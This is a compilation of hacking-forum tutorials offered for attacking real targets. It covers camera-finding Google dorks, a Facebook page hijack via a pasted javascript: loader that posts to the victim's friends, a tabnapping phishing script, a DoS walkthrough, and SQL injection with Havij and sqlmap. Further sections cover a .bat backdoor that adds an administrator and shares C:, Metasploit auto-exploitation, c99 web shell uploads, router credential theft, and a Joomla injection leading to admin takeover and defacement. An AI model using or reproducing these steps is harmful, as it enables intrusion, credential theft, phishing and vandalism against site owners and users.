HOW TO HACK SECURITY CAMERAS

First of all go to google search...

Try by entering the following dorks one by one:

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

Now after entering the dorks search for the website such as:
http://220.254.124.250/ViewerFrame?Direction=ZoomWide&Mode=Refresh&Resolution=640x480&Quality=Clarity&Interval=30&Size=STD&PresetOperation=Move&Language=1

HOW TO HACK A FACEBOOK FAN PAGE

First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

1. Download the exploit from this Link.

http://www.easy-share.com/1913947632/HackPages%20At%20facebook.rar


2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here. http://notepad-plus-plus.org/download

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)

NETTOOLS - AWESOME PACKAGE OF CRAZY HACKING TOOLS - DOWNLOAD

DOWNLOAD HERE:
http://www.mediafire.com/download.php?unujzogm3jd
http://users.telenet.be/ahmadi/nettools.htm

This program also called Powertools, becouse its a great program with lots of hacks but also other handy tools like: .bat to .exe / Tr4nsl4t3 / password protection / and things like that!

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

HOW TO CRASH SMALL WEBSITES USING RDOS OR DDOS - COMPLETE TUTORIAL

TOOLS REQUIRED:

Port Scanner
rDos

Step One: First we need to find the websites IP Adress. This is very easy todo.
 
Ok so say they URL is  http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s).

EXAMPLE:

Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.

[X] = Closed
[X] Vulnerable = Open

Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!

Ok open Up rDos that you download.
Enter the ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *= Flooding -=Crashed Or didn't connect!

EXAMPLE:

The site won't be directly offline!!
it starts with ***********
be patiend.. after some time it will go like this: **********-----------

This means the site crashed.

TAB NAPPING - ADVANCED METHOD OF PHISHING WITH HELP OF A REDIRECTING JAVASCRIPT - COMPLETE TUTORIAL

Tab napping is new type of phishing scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowledge. Tab Napping is a type of phishing with smarter way to confuse the victim.For example Victim was viewing page A in a tab of a browser and then left this idle and now using some other website in another tab of browser. After some time the page A will automatically change to the phishing page. This is your phishing page. Idea is to confuse the victim in multiple tabs of browser.

Now lets move on to the tutorial:

1. First we need a simple phishing setup that we have discussed before u can get ur phisher from here: click here

2. U will need ur hosting/blog/aur any webpage in which u can put the java script to sent its link to victim.

3. Get ur java script frm here.

4. Now u replace the link with your phishing page link in the java script from this line which comes in two places in the script

  timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect

5. After replacing it Now, Select all & Copy Tab Napping script and you need to paste this code at the end of the real page html code(means above </html> ).

6. This script will not make any change on ur web page or blog page.

• This script will track the user actions and as soon as the blog will kept ideal ,

• That script will redirect the victim to the phishing page your derived.
• Now send this blog address to your victim or u can upload ur malicous webpage on a web hosting & then send the link to victim.

7. Now for more betterment u can shorten ur url  so that victim wont be able to know ur intentions get any url shortner from here

HERE IS A DEMO OF TABNAPPING PAGE:

Just Go HERE and wait keep yourself idle for 10 sec. U will be redirected to my phishing page.

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

HOW TO APPLY SQL INJECTION THROUGH HAVJI V1.14

1.First Find a sql infected site (website vulnerable for injection)
2-Open havij and copy and paste infected link as shown in figure

 

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx



4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed



5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure




6. In that Just put mark username and password and click "Get data"




8. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...

Download havij v1.14 from here: http://www.itsecteam.com/files/havij/Havij1.14Free.rar

BUILD YOUR OWN SERVER TROJAN FILE (.BAT) - REMOTE ADMIN - HACKING WITHOUT ANY TOOL

Pen a dos prompt we will only need a dos prompt, and windows xp… 

Basics

Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

Starting

Server

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

Extras

Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

Client

Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

HOW TO HACK ANY COMPUTER THROUGH METASPLOIT USING HIS IP ADDRESS

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...



4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:



5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

___________________________________________________________

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

HOW TO HACK A WEBSITE USING SQL MAP - AUTOMATIC SQL INJECTION TOOL

Today i am going to write a sql injection tool. It's V 0.9 is just released. There are many changes in this tool from it's previous version. Sql injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Download Here:
http://sourceforge.net/projects/sqlmap/files/

HOW TO HACK A WEBSITE USING C99 SCRIPT

The c99 shell script is a very good way to hack a php enable web server. You have to find an unsecure uploader to upload this file to the server. Here i used unsecure uploader means the uploader which can't check for file extension and allow us to upload our executable scripts to the server.

This c99 shell allows an attacker to hijack the php enable web server. This script is very user friendly and having very good interface so it is easy to use. You can issue any php command to run on the web server. You can use any of the commands given in the script to run on the web server.

NOTE: This post is only for educational purpose. We advice you not to try this on any website. Use of this script on any website is illegal. 

For hacking a website using C99 script follow these steps.

1) Find a php web site with an uploader.
2) Test the file uploader to be secure or not by uploading files with a server executable extension.
3) If uploader is unsecure then upload the shell script.
4) Execute the uploaded code by navigating to the uploaded page.
5) A c99 script GUI will show up with a lot of options and details.
6) Look for the server details if the safe mode is on or off. If safe mode is off then the entire web server can be controlled by the script. If its on then on the directory in which c99 shell script is uploaded can only be controlled by the script.
7) Apart from being able to chmod, modify and delete files c99 also lets its user brute force the ftp but it requires an additional dictionary file which can run into hundreds of MBs.

NOTE: You can also execute this script on the web server by RFI

Search the and download the script from google.  or download from link
c99
but upper link may not work because script will soon be deleted by the file host.

HOW TO USE NETSTUMBLER FOR WI-FI HACKING AND SECURITY

1. Download the NetStumbler and Install it.

2. Run the NetStumbler. Then it will automatically starts scanning the wireless Networks around you.

3. Once its completed, you will see the complete list of wireless networks around you as shown in thesnapshot below:

List of Wireless Networks Scanned by NetStumbler

 There you will see different columns such as MAC, SSID, SPEED, VENDOR, TYPE and much more...

4. Now select anyone of the MAC address that you wish to hack and want to explore more about that. If you click on the MAC address of one of the discovered wireless networks under channels, you will see a graph that shows the wireless network’s signal strength. The more green and the less spaces are there,it indicates better is signal strength.

5. As you can see NetStumbler provides a lot more than just the name (SSID) of the wireless network. It provides the MAC address, Channel number,encryption type, and a bunch more. All of these come in use when we decides that we wants to get in the secured network by cracking the encryption. 

There are two most common types of Encryption Methods used by Wireless Networks:

a. WEP (Wired Equivalent Privacy) – WEP isn’t considered safe anymore. Many flaws have been discovered that allow hackers to crack a WEP key easily. I will explain how to hack the WEP in next tutorial so guys keep reading..

b. WAP (Wireless Application Protocol) – WAP is the currently the most secure and best option to secure your wireless network. It’s not as easily cracked as WEP because the only way to retrieve a WAP key is
to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won’t work and it could take decades to crack it if you brute-force it. This is why most hackers don’t even bother. But I will explain you smarter ways to hack WAP keys also rather than these noobish methods. I will explain this in my next consecutive  tutorials. So guys keep visiting.

Thats all about scanning the wireless networks, if you want that i should explain the other tools then please post in comments. I can explain them in future on demand.

Now how can protect our wireless network from scanned by NetStumber.

How to Protect yourself from NetStumbler?

 

1. Don not broadcast your SSID.

2. Always try to use stronger passwords like atleast one digit, one special character, uppercase letters mixed with lowercase letters.

3. But second point doesn't matter much so try to use better encryption method i.e. WAP to password protect your wireless Network.

HOW TO HACK ADSL ROUTERS - COMPLETE TUTORIAL

Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here:JAVA

You will also need to have version 8 OR older of Internet Explorer.

Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:



Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:



Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:



And on the display tab choose "Hosts with open ports only":



Then click OK to save the preferences and click start:



After few seconds or minutes you should see your first IP addresses:



Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:



Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:



Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:



And password in this case is: 854179

Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

GET SOMEONE'S IP ADDRESS THROUGH AIM/MSN/CHAT & LOCATION TOO

Free location tracking codes will trace location of your chat buddy with the help of  IP lookup.

These Location tracking codes, which you present in chat room
land on page with good pictures. meanwhile, the other chat buddy's IP Address is stored in a database. IP Look Up identify
Country, Near city, Local time, etc...  of the other buddy.

Get Your  chat Tracking codes.
After Sign Up, you get a set of tracking codes,
Using which you can find Location details.. of  your chat friends.

How to Sign Up

The process of sign up involves entering
1. First name2. Last name3. User name4. Pass word
Sign Up takes less than 20 Seconds to complete.
 Log In to your member page, where you find, your own personalized "Location tracking codes" ready to use in any chat rooms.
Member page  has mainly two pages
1. Several Tracking Codes (page)
2. Track results (page)

How to Find Location of your chat friend

Very first step is Sign Up. and Log in your member area.

Copy any one tracking code
Past  that code in chat room text box
Ask  your chat friend  to click and see the picture.
After few seconds click Track Result link and find chat friend's location details.

Sign Up NOW
NOW U GOT THE IP ADRESS IF U WONT FIND ANY MAP OR LOACATION THEN COPY THE IP ADRESS ND GOTO: www.ip-adress.com  

N paste ur ip there n search... u will find location too...

HOW TO HACK JOOMLA CMS WEBSITE - COMPLETE TUTORIAL

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge

DISCLAIMER:

THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:

USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!

But people still hacked sites that use Joomla as Content Management System?!?

Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

We hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"

Comes up with results for about 140,000 pages

At inj3ct0r.com search for: com_idoblog

Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==

Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II

+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--

This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:

[Firefox]

Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22

Site load normally...

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Site content blog Profile Admin

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--

Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7

In Target copy

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

and click on Inject

Follow standard steps until you find Column Name, as a result we have

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see

our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

username: admin

email: info@site.com

password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a

32 character salt that is appended to the end of the password string. The password is stored as

{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:

Code:

http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request

Forgot your Password? page will load.

In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.

If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin

activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:

Code:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter username admin and your password, click on Login

Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail